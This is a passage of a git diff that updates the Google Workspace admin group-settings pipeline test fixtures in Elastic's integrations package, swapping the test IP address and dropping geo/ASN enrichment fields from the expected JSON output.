+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBERS_DOWNLOAD"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_NAME","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_SETTING","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"WHITELISTED_GROUPS_UPDATED","parameters":[{"name":"WHITELISTED_GROUPS","value":"a,b,c"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json index 541fe1b6d70..aac7bcf5b20 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json @@ -2,31 +2,13 @@ "expected": [ { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -40,7 +22,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -64,8 +46,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091057400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CREATE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717685400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CREATE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", "provider": "admin", "action": "CREATE_GROUP", "id": "1", @@ -94,31 +76,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -132,7 +96,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -156,8 +120,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091065900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"DELETE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717691200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"DELETE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", "provider": "admin", "action": "DELETE_GROUP", "id": "1", @@ -186,31 +150,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -224,7 +170,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -248,8 +194,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091068500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_DESCRIPTION\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717697700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_DESCRIPTION\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", "provider": "admin", "action": "CHANGE_GROUP_DESCRIPTION", "id": "1", @@ -287,7 +233,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -306,35 +252,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.091070600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_LIST_DOWNLOAD\"}}", + "ingested": "2021-12-09T13:38:43.717704Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_LIST_DOWNLOAD\"}}", "provider": "admin", "action": "GROUP_LIST_DOWNLOAD", "id": "1", @@ -357,31 +285,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -395,7 +305,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -419,8 +329,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091072700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"ADD_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717708300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"ADD_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ADD_GROUP_MEMBER", "id": "1", @@ -450,31 +360,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -488,7 +380,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -512,8 +404,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091074800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"REMOVE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717712700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"REMOVE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REMOVE_GROUP_MEMBER", "id": "1", @@ -543,31 +435,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -581,7 +455,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -605,8 +479,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091076700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717717400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_GROUP_MEMBER", "id": "1", @@ -636,31 +510,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -674,7 +530,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -698,8 +554,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091078800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717721500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS", "id": "1", @@ -729,31 +585,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -767,7 +605,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -791,8 +629,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091080800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717726100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE", "id": "1", @@ -830,7 +668,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -854,35 +692,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.091082700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBER_BULK_UPLOAD\",\"parameters\":[{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER\",\"value\":\"0\"},{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER\",\"value\":\"10\"}]}}", + "ingested": "2021-12-09T13:38:43.717729800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBER_BULK_UPLOAD\",\"parameters\":[{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER\",\"value\":\"0\"},{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER\",\"value\":\"10\"}]}}", "provider": "admin", "action": "GROUP_MEMBER_BULK_UPLOAD", "id": "1", @@ -913,7 +733,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -932,35 +752,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.091084700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBERS_DOWNLOAD\"}}", + "ingested": "2021-12-09T13:38:43.717734400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBERS_DOWNLOAD\"}}", "provider": "admin", "action": "GROUP_MEMBERS_DOWNLOAD", "id": "1", @@ -983,31 +785,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1021,7 +805,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1045,8 +829,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091086800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_NAME\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:43.717738700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_NAME\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CHANGE_GROUP_NAME", "id": "1", @@ -1076,31 +860,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1114,7 +880,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1138,8 +904,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091088900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_SETTING\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:43.717743800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_SETTING\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_GROUP_SETTING", "id": "1", @@ -1177,7 +943,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1205,35 +971,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": 